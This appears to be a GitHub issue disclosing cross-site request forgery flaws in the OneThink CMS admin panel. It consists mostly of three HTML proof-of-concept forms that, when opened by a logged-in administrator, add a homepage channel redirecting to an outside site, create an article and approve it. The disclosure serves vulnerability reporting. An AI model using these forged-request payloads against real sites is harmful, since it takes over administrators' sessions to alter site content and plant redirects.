We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
After the Administrator logged in,open the following two pages. poc: fist.html add a page to the website home page and can jump to designated website.
<html> <!--add a page to the website home page and can jump to designated website--> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/test/onethink-master/wwwroot/admin.php?s=/Channel/add.html" method="POST"> <input type="hidden" name="pid" value="0" /> <input type="hidden" name="title" value="apple" /> <input type="hidden" name="url" value="http://www.baidu.com" /> <input type="hidden" name="target" value="0" /> <input type="hidden" name="sort" value="0" /> <input type="hidden" name="id" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
second.html add a blog and through the audit.
<html> <!-- add a blog --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/test/onethink-master/wwwroot/admin.php?s=/Article/update.html" method="POST"> <input type="hidden" name="title" value="apple234" /> <input type="hidden" name="content" value="fsdafdsaf" /> <input type="hidden" name="parse" value="0" /> <input type="hidden" name="name" value="dsfweweas" /> <input type="hidden" name="description" value="appleqw" /> <input type="hidden" name="type" value="2" /> <input type="hidden" name="display" value="1" /> <input type="hidden" name="level" value="0" /> <input type="hidden" name="cover_id" value="" /> <input type="hidden" name="view" value="0" /> <input type="hidden" name="comment" value="0" /> <input type="hidden" name="bookmark" value="0" /> <input type="hidden" name="create_time" value="" /> <input type="hidden" name="deadline" value="" /> <input type="hidden" name="link_id" value="0" /> <input type="hidden" name="template" value="" /> <input type="hidden" name="id" value="" /> <input type="hidden" name="pid" value="0" /> <input type="hidden" name="model_id" value="2" /> <input type="hidden" name="group_id" value="" /> <input type="hidden" name="category_id" value="2" /> <input type="submit" value="Submit request" /> </form> </body> </html> <!--through the audit--> <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/test/onethink-master/wwwroot/admin.php?s=/Article/setStatus/status/1.html" method="POST"> <input type="hidden" name="ids[]" value="7" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
No branches or pull requests
After the Administrator logged in,open the following two pages.
poc:
fist.html
add a page to the website home page and can jump to designated website.
second.html
add a blog and through the audit.
The text was updated successfully, but these errors were encountered: